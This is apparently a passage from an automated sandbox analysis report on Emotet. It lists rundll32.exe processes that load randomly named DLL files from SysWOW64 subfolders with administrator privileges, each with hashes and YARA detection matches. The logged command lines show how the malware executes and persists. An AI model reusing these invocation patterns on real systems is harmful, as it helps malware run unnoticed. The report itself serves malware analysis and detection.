                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2125222649.0000000000230000.00000040.00000001.sdmp, Author: Joe Security
                                                      Reputation:moderate

                                                      General

                                                      Start time:19:55:58
                                                      Start date:26/01/2021
                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Agilzgamuljjdwml\mwfcqgtqrgsdamx.pjv',#1
                                                      Imagebase:0xa70000
                                                      File size:44544 bytes
                                                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2135567121.0000000000210000.00000040.00000001.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2135550534.00000000001F0000.00000040.00000001.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2137671003.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                                      Reputation:moderate

                                                      General

                                                      Start time:19:56:03
                                                      Start date:26/01/2021
                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Obbeicpozdckojlb\bhzpo.yca',VDZITWzoE
                                                      Imagebase:0xa70000
                                                      File size:44544 bytes
                                                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2149727008.0000000000200000.00000040.00000001.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2151547723.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2149672448.00000000001E0000.00000040.00000001.sdmp, Author: Joe Security
                                                      Reputation:moderate

                                                      General

                                                      Start time:19:56:09
                                                      Start date:26/01/2021
                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Obbeicpozdckojlb\bhzpo.yca',#1
                                                      Imagebase:0xa70000
                                                      File size:44544 bytes
                                                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2165744116.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2160551478.0000000000210000.00000040.00000001.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2160390338.00000000001A0000.00000040.00000001.sdmp, Author: Joe Security
                                                      Reputation:moderate

                                                      General

                                                      Start time:19:56:14
                                                      Start date:26/01/2021
                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bpqpm\gwvn.lsl',KCoulWayDpJU
                                                      Imagebase:0xa70000
                                                      File size:44544 bytes
                                                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2169811211.00000000001D0000.00000040.00000001.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2169787783.00000000001A0000.00000040.00000001.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2170530219.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                                      Reputation:moderate

                                                      General

                                                      Start time:19:56:19
                                                      Start date:26/01/2021
                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bpqpm\gwvn.lsl',#1
                                                      Imagebase:0xa70000
                                                      File size:44544 bytes
                                                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2182561871.00000000001E0000.00000040.00000001.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2182761575.0000000000200000.00000040.00000001.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2184882219.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                                      Reputation:moderate

                                                      General

                                                      Start time:19:56:24
                                                      Start date:26/01/2021
                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Upjyf\ffrm.rmq',iFoslrVsudBDI
                                                      Imagebase:0xa70000
                                                      File size:44544 bytes
                                                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2192714957.0000000000210000.00000040.00000001.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2192700429.0000000000190000.00000040.00000001.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2193587143.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                                      Reputation:moderate

                                                      General

                                                      Start time:19:56:30
                                                      Start date:26/01/2021
                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Upjyf\ffrm.rmq',#1
                                                      Imagebase:0xa70000
                                                      File size:44544 bytes
                                                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.2340896532.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.2339373586.0000000000230000.00000040.00000001.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.2339389951.0000000000250000.00000040.00000001.sdmp, Author: Joe Security

                                                      Disassembly

                                                      Code Analysis

                                                      Reset < >